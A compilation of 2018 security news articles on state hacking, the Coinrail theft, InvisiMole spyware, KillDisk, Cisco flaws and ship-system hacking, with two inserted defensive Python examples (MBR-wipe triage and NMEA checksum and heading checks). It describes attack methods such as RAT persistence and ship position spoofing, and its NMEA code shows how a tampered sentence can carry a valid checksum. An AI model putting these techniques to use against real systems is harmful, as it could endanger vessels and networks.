“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan warned of the intensification of activity by Iranian hackers, who have also targeted financial institutions.

Which is the greatest threat?

Russia, of course! Russia-linked APT groups are very sophisticated and continuously target infrastructure worldwide. In some cases they have demonstrated destructive capabilities, like the attacks against the Ukrainian power grid.


According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry, which caused billions of dollars in damages to organizations worldwide and severe problems for critical infrastructure, such as hospitals in the UK.

“The problem is that the risk of miscalculation is huge,” Hannigan warned.


South Korean Cryptocurrency Exchange Coinrail hacked, hackers stole over $40M worth of ICO tokens
11.6.2018 securityaffairs  Cryptocurrency

Cryptocurrency exchanges continue to be a privileged target for hackers; the news of the day is the hack of the South Korean exchange Coinrail.
The hack happened over the weekend; on Sunday Coinrail announced the cyberheist. Attackers stole over $40M worth of ICO tokens that were held on the exchange's servers.

The company published a data breach notification on its website, which currently appears to be in maintenance mode.

coinrail
@Coinrail_Korea
The system is under inspection due to a hacking attempt. Some coins (Pundi X, NPXS) have been confirmed affected, and we are checking whether there is additional coin damage. Further details will be announced later. / There has been a cyber intrusion in our system. We're confirming it and some coins (Pundi X, NPXS) are confirmed.

5:19 AM - Jun 10, 2018
The exchange explained that attackers stole tokens issued during the initial coin offerings (ICOs) of Pundi X (NPXS), NPER (NPER), and Aston (ATX).

“Most notably, the hackers got away with $19.5 million-worth of NPXS tokens that were issued by payment project Pundi X’s ICO. Added to that they scored a further $13.8 million from Aston X, an ICO project building a platform to decentralize documents, $5.8 million in tokens for Dent, a mobile data ICO, and over $1.1 million Tron, a much-hyped project originating from China.” reported TechCrunch.

“That’s according to a wallet address that has been identified as belonging to the alleged attacker, who also got hold of smaller volumes of a further five tokens from Coinrail.”

South Korea is one of the countries with the highest cryptocurrency trading activity, but Coinrail is one of the smaller exchanges operating there.

According to coinmarketcap.com, the South Korean exchange ranks in the world’s top 90 based on trading volume.

After discovering the hack, Coinrail immediately took its wallets offline to secure its cryptocurrency assets; it is currently working with the affected ICO companies to freeze the stolen funds.


Coinrail asked other cryptocurrency exchanges to freeze some of the attacker’s addresses to which the coins were transferred.

At the time of writing there is no news about possible compensation for the exchange's customers; recently, Japan’s Coincheck refunded its customers following a cyberheist.


InvisiMole Spyware is a powerful malware that went undetected for at least five years
11.6.2018 securityaffairs Virus

Malware researchers from ESET have spotted a new sophisticated piece of spyware, tracked as InvisiMole, used in targeted attacks in Russia and Ukraine in the last five years.
Experts still haven’t attributed the malware to any threat actor; InvisiMole could be nation-state malware developed for cyber espionage purposes or the work of a financially-motivated group.

The researchers have discovered only a few dozen samples in the wild; the malicious code implements a broad range of features thanks to its modular architecture, which makes the threat very versatile.

“Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia.” reads the report published by ESET. “The campaign is highly targeted – no wonder the malware has a low infection ratio, with only a few dozen computers being affected.”

At the time of writing the experts still haven’t identified the attack vector, and there is no information about the types of campaigns in which it was involved.

Experts don’t exclude any infection vector, including installation facilitated by physical access to the machine.

The InvisiMole spyware has a modular structure composed of a wrapper DLL that leverages two other backdoor modules, embedded in its resources, to conduct its activities.


According to the researchers, the authors of the InvisiMole spyware have removed any clue that could attribute the malware to a specific actor; the only exception is the compilation date of a single file (October 13, 2013). Compilation dates for all the remaining files have been removed by the authors.

The main module is called RC2FM and supports 15 commands that allow the attacker to search and exfiltrate data from the infected system.

RC2FM supports commands for gathering system information and performing simple changes on the system; it also includes spyware features such as control of the microphone and the user’s webcam.

The second module, dubbed RC2CL, is larger and more advanced than RC2FM; it is able to extract proxy settings from browsers and use those configurations to send data to the C&C server when a proxy is present.

“This module communicates with C&C servers that are either hardcoded in the sample, or updated later by the attackers.” continues the analysis.

“Moreover, the module is able to reach out to the C&C servers even if there is a proxy configured on the infected computer. If a direct connection is unsuccessful, the module attempts to connect to any of its C&C servers using locally-configured proxies or proxies configured for various browsers (Firefox, Pale Moon, and Opera).”

The RC2CL module supports 84 backdoor commands and implements almost all the spyware capabilities, including the ability to run remote shell commands, registry key manipulation, file execution, getting a list of local apps, loading drivers, getting network information, disabling UAC, and turning off the Windows firewall.

RC2CL can also record audio via the microphone and take screenshots via the webcam, in the same way the InvisiMole spyware can do with the first module.

The RC2CL module also implements a safe-delete feature to hinder forensic investigation.

“Another example of how the malware authors attempt to act covertly is the way they treat traces left on the disk. The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers. Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack – after the victim becomes aware of it.” continues the report.

“This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted.”

The full list of IoCs related to the threat can be found on GitHub.


Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.2018 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN services banned in the country.
The Russian Government has approved a new bill to punish search engines that are not aligned with Moscow and that allow their users to find VPN services and anonymization tools that circumvent the censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, the Duma will also impose fines on search engines if they continue to return, in response to users’ queries, results pointing to domains in the up-to-date database of blocked domains.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), while officials will face fines up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 and 700,000 rubles (roughly $8,019 to $11,227).

“The failure of the operator of the search system to connect to this system entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials – from thirty thousand to fifty thousand rubles; on legal entities – from five hundred thousand to seven hundred thousand rubles,” reads the press release published by the Duma.

Russians ordinarily use VPN services and other anonymizing services to access blocked content and bypass censorship; the following graph shows the continuous growth in the number of Tor users in Russia.

[Figure: number of Tor users in Russia over time]

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibits the use, from Russian territory, of any service that could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the government regulatory authority.

Since May 3rd, 2018, Russia’s media and communications regulatory authority Roskomnadzor has blocked over 50 virtual private networks (VPNs), web proxies and anonymizing networks.

However, many VPNs and Internet proxy services still haven’t complied with the law by registering themselves; for this reason, Moscow introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced a subdomain of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against government censorship, with a specific reference to the ban on Telegram.


Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.2018 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials who spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February; the hackers belong to a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The report published by the media outlet doesn’t reveal the name of the U.S. Navy contractor; it only reports that it works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

The Sea Dragon project was launched by the Pentagon to adapt existing US military technologies to new applications; the US Government has spent more than $300 million on the initiative since 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”


At the time, the U.S. Navy did not comment on the incident for security reasons.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information,” said Cmdr. Bill Speaks, a U.S. Navy spokesman.

“It would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is only the latest in a series: Chinese hackers have already stolen sensitive information from the US military in the past, such as the blueprints of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.


Trend Micro spotted a new variant of KillDisk wiper in Latin America
9.6.2018 securityaffairs Virus

In May, experts at Trend Micro observed a new sample of KillDisk in Latin America, the malware infected the systems of a bank.
A new sample of the KillDisk wiper was spotted earlier this year targeting financial organizations in Latin America, Trend Micro reports.

The destructive malware was involved in the attacks against Ukraine’s power grid in December 2015; the attack was attributed to a Russia-linked APT group tracked as BlackEnergy.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

In May, experts at Trend Micro observed a master boot record (MBR)-wiping malware in Latin America; the malicious code infected the systems of a bank, with a severe impact on its operations.

According to the experts, the wiper attack itself was not the objective: it served as a distraction, the real goal being access to the SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded KillDisk based on the error message displayed by the affected systems.


Analysis of the payload alone makes it difficult to determine the motivation behind the attack.

The experts analyzed a sample of that variant and discovered it was created with Nullsoft Scriptable Install System (NSIS), which is an open-source application used to create setup programs.

The author named the sample “MBR Killer”; it includes a routine to wipe the first sector of the machine’s physical disk.

The sample was protected by VMProtect, a tool used to prevent reverse engineering of the code in a virtualized environment.

The analysis of the sample did not reveal any connection to a command-and-control (C&C) infrastructure, nor the presence of ransomware-like routines.

“We haven’t found any other new or notable routines in the sample we have. There is no evident command-and-control (C&C) infrastructure or communication, or ransomware-like routines coded into the sample. There are no indications of network-related behavior in this malware.” continues the analysis.

The malware wipes all physical hard disks on the infected system: it retrieves a handle to the hard disk, overwrites the first sector of the disk (512 bytes) with 0x00 bytes, then forces the machine to shut down.
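The Python triage helper below is an added example (not Trend Micro's code) for a responder who has imaged a suspect disk: it inspects the first 512-byte sector the report describes and reports whether it is all zeros, carries the 0x55AA boot signature and still holds a partition table. The sample MBR is constructed.

```python
"""Triage sector 0 of a disk image for KillDisk-style MBR wiping."""
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446        # four 16-byte entries at 446..509
BOOT_SIGNATURE = b"\x55\xaa"        # bytes 510..511 of a valid MBR
ENTRY_FORMAT = "<B3sB3sII"          # status, CHS start, type, CHS end, LBA start, sector count


def parse_partition_table(sector):
    """Decode the four MBR partition entries, skipping empty (type 0x00) slots."""
    entries = []
    for slot in range(4):
        offset = PARTITION_TABLE_OFFSET + 16 * slot
        status, _chs_start, ptype, _chs_end, lba_start, sectors = struct.unpack_from(
            ENTRY_FORMAT, sector, offset)
        if ptype != 0:
            entries.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                            "lba_start": lba_start, "sectors": sectors})
    return entries


def inspect_sector0(sector):
    """Classify a 512-byte sector as intact, damaged, or wiped (every byte 0x00)."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    all_zero = not any(sector)
    has_signature = sector[510:512] == BOOT_SIGNATURE
    partitions = [] if all_zero else parse_partition_table(sector)
    if all_zero:
        verdict = "wiped"        # consistent with the 0x00 overwrite described in the report
    elif has_signature and partitions:
        verdict = "intact"
    else:
        verdict = "damaged"      # signature or table missing: partial overwrite or corruption
    return {"verdict": verdict, "all_zero": all_zero,
            "boot_signature": has_signature, "partitions": partitions}


def make_sample_mbr():
    """Constructed minimal MBR: a few non-zero boot-code bytes, one NTFS partition, signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[0:3] = b"\x33\xc0\x8e"   # stand-in for real boot code
    entry = struct.pack(ENTRY_FORMAT, 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00",
                        2048, 1048576)
    sector[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + 16] = entry
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def inspect_image(path):
    """Read sector 0 from a raw disk image (or block device) and triage it."""
    with open(path, "rb") as f:
        return inspect_sector0(f.read(SECTOR_SIZE))


if __name__ == "__main__":
    print("healthy sample:", inspect_sector0(make_sample_mbr())["verdict"])
    print("zeroed sector: ", inspect_sector0(bytes(SECTOR_SIZE))["verdict"])
```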

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” concludes Trend Micro.

The report also includes Indicators of Compromise (IoCs).


Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
9.6.2018 securityaffairs Vulnerebility

Cisco has removed hardcoded credentials from Cisco Wide Area Application Services (WAAS), software designed to optimize WAN traffic management.
The hardcoded credential (CVE-2018-0329) is a read-only SNMP community string in the configuration file of the SNMP daemon; it could be exploited by attackers to read any data that is accessible via SNMP on the affected device.

“A vulnerability in the default configuration of the Simple Network Management Protocol (SNMP) feature of Cisco Wide Area Application Services (WAAS) Software could allow an unauthenticated, remote attacker to read data from an affected device via SNMP.” states the security advisory published by Cisco.

“The vulnerability is due to a hard-coded, read-only community string in the configuration file for the SNMP daemon. An attacker could exploit this vulnerability by using the static community string in SNMP version 2c queries to an affected device.”

There are no workarounds that address this vulnerability.

The SNMP community string is hidden from administrators, which means there was no way to find the vulnerability during regular audits of the architecture.

The flaw was reported by security researcher Aaron Blair while investigating the CVE-2018-0352 WAAS vulnerability, a flaw in the Cisco Wide Area Application Services Software Disk Check Tool that could lead to privilege escalation.

“A vulnerability in the Disk Check Tool (disk-check.sh) for Cisco Wide Area Application Services (WAAS) Software could allow an authenticated, local attacker to elevate their privilege level to root. The attacker must have valid user credentials with super user privileges (level 15) to log in to the device.” reads the security advisory.

“The vulnerability is due to insufficient validation of script files executed in the context of the Disk Check Tool. An attacker could exploit this vulnerability by replacing one script file with a malicious script file while the affected tool is running. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device.”

CVE-2018-0352 is a privilege escalation in the WAAS disk check tool; Blair exploited it to elevate his privileges to “root,” an access level that allowed him to discover the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.


Unfortunately, hardcoded credentials and undocumented accounts are not uncommon in Cisco appliances; the company addressed similar issues in Prime Collaboration Provisioning (PCP), in the Cisco IOS XE operating system, and in the Digital Network Architecture (DNA) Center.


Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.2018 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.


Hackers Can Hijack, Sink Ships: Researchers
9.6.2018 securityweek  Hacking

Vulnerable ship tracker by Pen Test Partners

Insecure configurations and vulnerabilities in communications and navigation systems can allow hackers to remotely track, hijack and sink ships, according to researchers at penetration testing and cybersecurity firm Pen Test Partners.

In October 2017, Pen Test Partners presented its research into vulnerabilities affecting the satellite communications (satcom) systems used by vessels. The company has continued to analyze software and hardware used in the maritime industry and found that they are affected by serious flaws.

It has also created an interactive map that can be used to track vulnerable ships. The tracker combines data from Shodan with GPS coordinates and it can show vulnerable ships in real time. However, the company will only periodically refresh the data shown on the map in an effort to prevent abuse.

Satellite communications is the component that exposes ships to remote hacker attacks, as shown by Pen Test Partners last year and, at around the same time, by researchers at IOActive.

While there are some vulnerabilities in these systems themselves, the main issue is that many satcom terminals continue to use default credentials, allowing unauthorized users to gain admin-level access.

Many of the security holes disclosed this week by Pen Test Partners can be mitigated by setting a strong administrator password on the satcom terminal. Other serious issues discovered by researchers have been reported to Cobham, whose Fleet One terminal was used in experiments, and have not been disclosed.

According to researchers, once an attacker gains access to the terminal, they can replace the firmware due to the lack of proper validation checks or downgrade it to an older and more vulnerable version, and they can edit the web application running on the terminal. Experts also discovered poorly protected admin passwords in configuration files.

An even bigger problem, researchers warn, is that once an attacker gains access to the satcom terminal, they can move laterally to other systems. One of them is the Electronic Chart Display and Information System (ECDIS), which is used by vessels for navigation.

Since the ECDIS can be connected directly to the autopilot feature, hacking this system can allow an attacker to take control of a ship.

“We tested over 20 different ECDIS units and found all sorts of crazy security flaws. Most ran old operating systems, including one popular in the military that still runs Windows NT,” explained Pen Test Partners researcher Ken Munro.

In one case, the ECDIS had a poorly protected configuration interface that allowed an attacker to spoof the position of the GPS receiver on the ship and make the vessel “jump” to a slightly different location.

Reconfiguring the ECDIS can also allow an attacker to change the size of the targeted ship as seen by other nearby vessels via the automatic identification system (AIS) tracker.

“So, simply spoof the ECDIS using the vulnerable config interface, ‘grow’ the ship and ‘jump’ it into the shipping lanes,” Munro explained. “Other ships’ AIS will alert the ship’s captain to a collision scenario. It would be a brave captain indeed to continue down a busy, narrow shipping lane whilst the collision alarms are sounding. Block the English Channel and you may start to affect our supply chain.”

Another attack scenario described by Pen Test Partners targets the operational technology (OT) systems on board a ship. These systems are used to control steering, engines, ballast pumps and other components, and they communicate via the NMEA 0183 protocol.

Since messages sent over NMEA 0183 don’t use any authentication, encryption or validation, a man-in-the-middle (MitM) attacker can modify the data and, for example, inject small errors that would cause the ship to alter its course when autopilot is engaged, researchers warn.
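The NMEA 0183 property described above, shown in an added example that is not part of the Pen Test Partners research: the trailing checksum is a plain XOR of the sentence body, so anyone who can rewrite a sentence can also recompute it, and a receiver is left with plausibility checks such as flagging abrupt heading changes. The HDT (true heading) sentences below are constructed.

```python
"""Added example: parse NMEA 0183 sentences, verify the XOR checksum, and run a
defensive plausibility check on heading data. Sample sentences are constructed."""
from dataclasses import dataclass
from typing import List, Optional


def nmea_checksum(body: str) -> int:
    """NMEA 0183 checksum: XOR of every character between '$' and '*'."""
    cs = 0
    for ch in body:
        cs ^= ord(ch)
    return cs


@dataclass
class Sentence:
    talker: str        # e.g. "HE" (heading sensor)
    formatter: str     # e.g. "HDT" (true heading)
    fields: List[str]
    checksum_ok: bool


def parse_sentence(line: str) -> Optional[Sentence]:
    """Return the parsed sentence, or None if it is not well-formed."""
    line = line.strip()
    if not line.startswith("$") or "*" not in line:
        return None
    body, _, cs_hex = line[1:].partition("*")
    try:
        claimed = int(cs_hex[:2], 16)
    except ValueError:
        return None
    fields = body.split(",")
    address = fields[0]
    if len(address) < 3:
        return None
    return Sentence(address[:-3], address[-3:], fields[1:],
                    nmea_checksum(body) == claimed)


def build_sentence(address: str, fields: List[str]) -> str:
    """Assemble a sentence with a correct checksum (what a sender, or a
    man-in-the-middle that edits the body, would produce)."""
    body = ",".join([address] + fields)
    return f"${body}*{nmea_checksum(body):02X}"


def flag_heading_jumps(lines: List[str], max_step_deg: float = 5.0) -> List[str]:
    """Plausibility check for HDT sentences: report bad checksums and any
    heading that differs from the previous valid one by more than max_step_deg.
    The checksum alone cannot distinguish a tampered sentence from a genuine
    one, so a sudden jump is one of the few signals a receiver has."""
    alerts: List[str] = []
    last: Optional[float] = None
    for line in lines:
        s = parse_sentence(line)
        if s is None or s.formatter != "HDT" or not s.fields:
            continue
        if not s.checksum_ok:
            alerts.append(f"bad checksum: {line}")
            continue
        try:
            heading = float(s.fields[0])
        except ValueError:
            alerts.append(f"unparseable heading: {line}")
            continue
        if last is not None:
            # shortest angular distance, so 359 -> 1 counts as a 2 degree step
            delta = abs((heading - last + 180) % 360 - 180)
            if delta > max_step_deg:
                alerts.append(f"heading jump {last:.1f}->{heading:.1f}: {line}")
        last = heading
    return alerts


if __name__ == "__main__":
    genuine = build_sentence("HEHDT", ["90.0", "T"])
    edited_no_recalc = genuine.replace("90.0", "95.0")          # fails checksum
    edited_recalc = build_sentence("HEHDT", ["95.0", "T"])      # passes checksum
    print(genuine, parse_sentence(genuine).checksum_ok)
    print(edited_no_recalc, parse_sentence(edited_no_recalc).checksum_ok)
    print(edited_recalc, parse_sentence(edited_recalc).checksum_ok)
    stream = [build_sentence("HEHDT", [h, "T"]) for h in ("90.0", "90.5", "91.0", "97.0")]
    print(flag_heading_jumps(stream))
```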

“The advent of always-on satellite connections has exposed shipping to hacking attacks. Vessel owners and operators need to address these issues quickly, or more shipping security incidents will occur. What we’ve only seen in the movies will quickly become reality,” Munro concluded.


Capgemini to Acquire Leidos Cyber
9.6.2018 securityweek  IT

French IT consultancy firm Capgemini announced Thursday an agreement to acquire Leidos Cyber from the U.S.-based Leidos. The acquisition is subject to anti-trust and Committee of Foreign Investment in the United States (CFIUS) approvals, and is expected to complete before the end of 2018. Financial terms have not yet been disclosed.

Founded in 1967, the Capgemini Group employs more than 200,000 people in more than 40 countries. It focuses on consulting, technology services and digital transformation; and reported global revenue of EUR 12.8 billion in 2017.

In terms of its heritage, a Capgemini spokesperson told SecurityWeek, "Leidos Cyber was formed through the mergers, since 2011, of Lockheed Martin’s corporate division, Industrial Defender and Leidos’ own commercial cybersecurity business."

Leidos was formerly known as Science Applications International Corporation (SAIC), which changed its name in 2013. A new SAIC was then spun off from Leidos, retaining the original name. Leidos Cyber is the cybersecurity arm of Leidos Holdings, employing almost 500 cybersecurity professionals across North America. Leidos reported 2017 revenues of $10.2 billion.

The products and services of the two organizations complement each other. Capgemini gives a global market to Leidos Cyber's services; while Leidos Cyber will give Capgemini a much stronger footing in the U.S.

"Leidos Cyber is a pioneer in the field of cybersecurity. It defined the market in protecting the industrial control ecosystem for the mission critical infrastructure needs of global enterprises," comments Paul Hermelin, Chairman and CEO, Capgemini. Leidos' core market comprises government and highly regulated industries.

"Its world class security expertise and status as a trusted advisor to many Fortune 500 leaders," continued Hermelin, "makes it totally complementary to Capgemini's global cybersecurity practice. It is the perfect fit to reinforce our cybersecurity practice in North America, to help meet the security requirements of our international client base."

Robert Meindl, president of Leidos Cyber, is also confident, calling Capgemini 'a natural home for our commercial cybersecurity team'. "Not only will we be able to play our part in augmenting the North America cybersecurity practice," he said, "but we also look forward to adding value to the global security provisions of Capgemini's clients around the world."

Angie Heise, president at Leidos Civil Group, added, "Capgemini's commitment to engaging a broad set of commercial markets makes it an ideal fit for the Leidos Cyber business."


Patchwork Cyberspies Target U.S. Think Tanks
9.6.2018 securityweek  CyberSpy

The cyber-espionage group known as "Patchwork" has been launching cyberattacks directly against United States-based think tanks, Volexity reveals.

Believed to be operating out of the Indian subcontinent and supposedly active since 2014, the threat group was previously observed targeting mainly government-associated organizations connected to Southeast Asia and the South China Sea.

After expanding its target list a couple of years ago, the group adopted new exploit techniques in late 2017, and also updated malware families in its arsenal earlier this year.

Also referred to as Dropping Elephant, Patchwork has shown an increase in activity recently, and also started using unique tracking links in their phishing emails, to identify which recipients opened their messages, Volexity has discovered.

The security firm observed three spear-phishing campaigns launched by the group, “leveraging domains and themes mimicking those of well-known think tank organizations in the United States.” The actors used articles and themes from the Council on Foreign Relations (CFR), the Center for Strategic and International Studies (CSIS), and the Mercator Institute for China Studies (MERICS) as lures, along with malicious Rich Text Format (RTF) documents.

The attacks shared the use of email recipient tracking, a linked RTF document, and the final payload, but various elements in each campaign were different, Volexity reports.

In one attack, the actors also used a domain name similar to the Foreign Policy Research Institute (FPRI), in a message supposedly coming from CFR. The spear-phishing emails contained links to files featuring the .doc extension, but which were in fact RTF documents attempting to exploit CVE-2017-8750 and execute code via a malicious scriptlet file embedded in the document.

The group apparently used publicly available exploit code from GitHub to deploy the freely available QuasarRAT.

Written in C#, the remote access tool (RAT) provides AES encryption of network communication, file management, the ability to download, upload, and execute files, keylogging, remote desktop access, remote webcam viewing, reverse proxy, and browser and FTP client password recovery, among other capabilities.

The malware achieves persistence by creating a scheduled task that points to the QuasarRAT binary (saved on disk as microsoft_network.exe). The scheduled task, named Microsoft_Security_Task, runs at 12:00 AM each day, then repeats every 5 minutes for 60 days.

When executed, the malware first attempts to determine the geographical location of the infected host, then starts beaconing over an encrypted connection to the command and control domain.

“The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. While there were a few peculiar components to some of the spear phish messages, the campaigns and themes were strategically relevant to the organizations being targeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message,” Volexity notes.


Nikesh Arora Takes Over as New CEO of Palo Alto Networks
9.6.2018 securityweek  IT

Nikesh Arora became the new CEO of Santa Clara, CA-based Palo Alto Networks (PAN) on Wednesday, June 6. He replaces existing CEO Mark McLaughlin, who will continue with PAN as vice chairman of the PAN board.

"Over the course of several quarters, I have been discussing succession planning with the Board and I couldn't be more pleased that we have found a leader in Nikesh," said McLaughlin, who has served as CEO since 2011.

Share price dipped slightly since the news became known at the beginning of the month, but at $197.07 (at the time of writing) it is still considerably up on the firm's 52-week low of $126.56. It has been suggested that the market is slightly wary of Arora's lack of cybersecurity experience. He is, however, a big business player with big business experience.

Nikesh Arora - chairman and CEO of Palo Alto Networks

Arora's former positions include chief business officer at Google (Fortune claims that Eric Schmidt once described him as "the finest analytical businessman I have ever worked with"); and COO at SoftBank (where he was 'heir apparent' to founder Masayoshi Son). He left SoftBank when Son decided to stay on for another decade. At Google, Fortune claims, "He helped instill discipline into the quirky Internet upstart, focusing its untamed energy into unstoppable commercial force."

Arora is not concerned about his personal lack of cybersecurity experience. "The good news is I knew nothing about advertising or ad sales when I joined Google in 2004 and I think that worked out," he told CNBC. In 2012, he was Google's highest paid executive. He expects to work closely with both McLaughlin and PAN founder and CTO, Nir Zuk. "I may not have a background in security, but with my background as an engineer, I can sit down with Zuk to help guide the next generation of products we can offer," he told recode.net.

Arora's pay package is impressive -- especially if he provides impressive growth to the company. His base salary is around $1 million per year, with a further $1 million as target bonus; plus $40 million of restricted stock vesting over seven years, and stock options valued at $66 million vesting in increments. "If the stock quadruples," reports Business Today, "he is in for a windfall -- he gets all of them." BT calculates this will amount to $128 million.

"We wanted to make sure that Nikesh, as the new leader of the company, has strong skin in the game," Asheem Chandna, a member of Palo Alto Networks' board of directors and investor at Greylock Partners, told Fortune. "And we wanted to make sure Nikesh is rewarded if he creates multiples of value for shareholders."

That leaves the question of how Arora will seek such dynamic growth for PAN. McLaughlin claims the transition from him to a new CEO has been planned for some time. He told CNBC that PAN is already focused on the new developing markets: cloud, machine learning and new-age software, and suggested that PAN will look very different in five years' time.

"In looking for the perfect person to do that, we wanted somebody who is a very demonstrated business executive at scale and would bring those key attributes to the table to take us where the company's going to be in five years."

"I'm hoping, as we go forward," added Arora, "we'll strike partnerships not just with Alphabet and Google but also with the other big players in the space, be it Microsoft or Amazon or many of our partners in the cybersecurity space." His intention is to apply the same principles of scale that he learned from his time at Google to Palo Alto Networks.


Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
9.6.2018 securityaffairs
Vulnerability

Cisco fixed several flaws in the Prime Collaboration Provisioning product that allows customers to manage their communications services.
Cisco released security patches to address severe vulnerabilities in its Prime Collaboration Provisioning (PCP) solution; one of the issues was rated as critical.

The vulnerabilities have been found by Cisco during internal security testing and there is no evidence of attacks exploiting the flaws in the wild.

The Prime Collaboration Provisioning is a web-based provisioning product that allows its customers to manage their communications services.

The critical vulnerability, tracked as CVE-2018-0321, could be exploited by a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform malicious actions that affect both the PCP and the devices connected to the solution.

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) could allow an unauthenticated, remote attacker to access the Java Remote Method Invocation (RMI) system.” reads the security advisory published by Cisco.

“The vulnerability is due to an open port in the Network Interface and Configuration Engine (NICE) service. An attacker could exploit this vulnerability by accessing the open RMI system on an affected PCP instance. An exploit could allow the attacker to perform malicious actions that affect PCP and the devices that are connected to it.”

